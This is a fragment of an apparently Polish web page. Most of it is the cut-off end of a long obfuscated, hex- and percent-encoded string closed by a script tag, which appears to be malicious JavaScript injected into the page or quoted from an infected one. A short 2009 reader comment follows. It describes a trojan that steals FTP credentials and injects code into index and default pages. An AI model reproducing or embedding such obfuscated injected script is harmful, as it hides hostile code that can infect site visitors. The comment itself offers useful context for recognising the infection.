x33\x30\x25\x32\x36\x25\x32\x35\x25\x33\x30\x25\x32\x64\x25\x30\x30\x25\x31\x61\x25\x32\x37\x25\x32\
x30\x25\x33\x34\x25\x32\x32\x25\x32\x33\x25\x37\x32\x25\x37\x31\x25\x34\x63\x25\x36\x65\x25\x34\x64\
x25\x32\x32\x25\x32\x36\x25\x31\x32\x25\x31\x35\x25\x30\x31\x25\x33\x38\x25\x31\x66\x25\x34\x38\x25\
x34\x33\x25\x35\x38\x25\x33\x34\x25\x36\x66\x25\x32\x38\x25\x33\x65\x25\x30\x36\x25\x32\x34\x25\x30\
x39\x25\x30\x61\x25\x32\x66\x25\x32\x38\x25\x33\x32\x25\x30\x65\x25\x31\x36\x25\x36\x39\x25\x34\x61\
x25\x36\x38\x25\x35\x65\x25\x32\x31\x25\x36\x63\x25\x33\x32\x25\x32\x35\x25\x32\x62\x25\x33\x61\x25\
x31\x38\x25\x30\x30\x25\x36\x61\x25\x32\x37\x25\x30\x32\x25\x31\x34\x25\x31\x62\x25\x34\x37\x25\x35\
x62\x25\x36\x37\x25\x31\x30\x25\x32\x31\x25\x33\x62\x25\x31\x63\x25\x32\x38\x25\x37\x35\x25\x33\x31\
x25\x33\x65\x25\x34\x36\x25\x37\x63\x25\x33\x38\x25\x32\x61\x25\x32\x31\x25\x32\x37\x25\x36\x30\x25\
x33\x62\x25\x32\x61\x25\x33\x32\x25\x34\x62\x25\x31\x64\x25\x36\x62\x25\x32\x32\x25\x32\x39\x25\x33\
x36\x25\x33\x62\x25\x33\x65\x25\x31\x39\x25\x36\x66\x25\x30\x31\x25\x31\x66\x25\x31\x62\x25\x33\x30\
x25\x31\x33\x25\x30\x66\x25\x31\x64\x25\x32\x61\x25\x37\x31\x25\x31\x36\x25\x33\x31\x25\x31\x36\x25\
x32\x64\x25\x34\x33\x25\x34\x37\x25\x32\x34\x25\x30\x34\x25\x30\x66\x25\x32\x61\x25\x36\x61\x25\x33\
x35\x25\x36\x37\x25\x34\x61\x25\x31\x65\x25\x30\x66\x25\x31\x31\x25\x31\x37\x25\x34\x31\x25\x35\x38\
x25\x35\x35\x25\x36\x33\x25\x36\x65\x25\x34\x37\x25\x35\x36\x25\x36\x35\x25\x36\x38\x25\x37\x61\x25\
x32\x34\x25\x32\x66\x25\x32\x65\x25\x37\x63\x25\x36\x32\x25\x34\x31\x25\x34\x61\x25\x34\x36\x25\x37\
x36\x25\x36\x31\x25\x32\x34\x25\x32\x62\x25\x36\x36\x25\x33\x66\x25\x33\x36\x25\x30\x36\x25\x37\x66\
x25\x34\x30\x25\x35\x63\x25\x37\x33\x25\x36\x33\x25\x33\x65\x25\x32\x34\x25\x30\x32\x25\x33\x66\x25\
x37\x38\x25\x33\x34\x25\x31\x65\x25\x31\x34\x25\x31\x31\x25\x36\x37\x25\x37\x65\x25\x36\x31\x25\x34\
x61\x25\x36\x30\x25\x32\x64\x25\x33\x39\x25\x32\x66\x25\x33\x65\x25\x36\x34\x25\x30\x36\x25\x30\x61\
x25\x35\x61\x25\x30\x33\x25\x33\x65\x25\x33\x62\x25\x32\x30\x25\x32\x34\x25\x32\x39\x25\x32\x34\x25\
x33\x39\x25\x32\x66\x25\x32\x31\x25\x37\x35\x25\x35\x39\x25\x35\x31\x25\x34\x66\x25\x36\x36\x25\x36\
x37\x25\x36\x62\x25\x35\x66\x25\x37\x33\x25\x36\x65\x25\x37\x36\x25\x33\x35\x25\x30\x31\x25\x31\x66\
x25\x36\x36\x25\x32\x32\x25\x31\x33\x25\x32\x33\x25\x33\x37\x25\x33\x34\x25\x32\x37\x25\x33\x36\x25\
x36\x37\x25\x34\x64\x25\x37\x37\x25\x33\x65\x25\x30\x32\x25\x32\x32\x25\x36\x61\x25\x31\x62\x25\x32\
x61\x25\x37\x63\x25\x36\x61\x25\x37\x37\x25\x34\x31\x25\x30\x61\x25\x34\x38\x25\x37\x64\x25\x33\x66\
x25\x36\x38\x25\x37\x30\x25\x36\x62\x25\x37\x37\x25\x31\x33\x25\x33\x34\x25\x32\x32\x25\x30\x66\x25\
x30\x37\x25\x33\x30\x25\x37\x62\x25\x36\x34\x25\x37\x63\x25\x35\x64\x25\x30\x39\x25\x35\x62\x25\x34\
x66\x25\x35\x32\x25\x37\x35\x25\x37\x62\x25\x37\x39\x25\x36\x35\x25\x37\x61\x25\x36\x36\x25\x36\x35\
x25\x37\x36\x25\x37\x38\x25\x37\x31\x25\x36\x61\x25\x37\x31\x25\x36\x37\x25\x35\x63\x25\x36\x35\x25\
x31\x35\x25\x36\x63\x25\x33\x30\x25\x30\x63\x25\x36\x65\x25\x36\x35\x25\x37\x63\x25\x30\x36\x25\x32\
x31\x25\x30\x65\x25\x33\x35\x25\x33\x63\x25\x30\x32\x25\x33\x31\x25\x31\x33\x25\x32\x38\x25\x31\x63\
x25\x33\x63\x25\x37\x31\x25\x37\x61\x25\x37\x34\x25\x37\x38\x25\x34\x62\x25\x35\x35\x25\x36\x31\x25\
x30\x63\x25\x36\x30\x25\x37\x39\x25\x36\x34\x25\x32\x65\x25\x33\x64\x25\x33\x38\x25\x32\x34\x25\x35\
x62\x25\x30\x39\x25\x37\x30\x25\x33\x65\x25\x37\x30\x25\x33\x62\x25\x32\x36\x25\x35\x33\x25\x36\x62\
x25\x30\x37\x25\x33\x36\x25\x36\x66\x25\x33\x35\x25\x36\x39\x25\x33\x30\x25\x36\x63\x25\x32\x63\x25\
x36\x38\x25\x33\x61\x25\x30\x64\x25\x37\x65\x25\x30\x37\x25\x33\x63\x25\x31\x63\x25\x37\x62\x25\x33\
x31\x25\x33\x65\x25\x30\x66\x25\x32\x63\x25\x37\x62\x25\x32\x62\x25\x31\x30\x25\x31\x39\x25\x37\x62\
x25\x33\x33\x25\x33\x30\x25\x30\x35\x25\x30\x37\x25\x31\x31\x25\x30\x65\x25\x32\x66\x25\x31\x31\x25\
x31\x65\x25\x30\x35\x25\x37\x62\x25\x36\x63\x25\x35\x65\x25\x33\x35\x25\x33\x38\x25\x31\x62\x25\x30\
x66\x25\x35\x64\x25\x33\x64\x25\x33\x33\x25\x33\x34\x25\x30\x32\x25\x33\x32\x25\x32\x39\x25\x33\x63\
x25\x34\x36\x25\x35\x39\x25\x37\x62\x27\x29\x3b');</script>
Jeden komentarz do
23 czerwca, 2009 o godzinie 19:12
Tak dla informacji, trojan zamieszczony na komputerze z ktorego dokonano logowania przesyla dalej login i haslo a nastepnie loguje sie samodzielnie na serwer jak nie wykryje kody, mnie sie zdazylo wlasnie ze trojan nie dal rady nadpisac calego pliku i wuciol polowe kody.
bot atakuje wsztrkie pliki standardowo uznawane za defaultowo wczytywane przy odwiedzeniu jakiegos adresu: index, main, start, default (html|htm|xhtml|xml|php|asp|aspx|itp…), jak na razie nie zdazylo mi sie by zaatakowal pliki .htaccess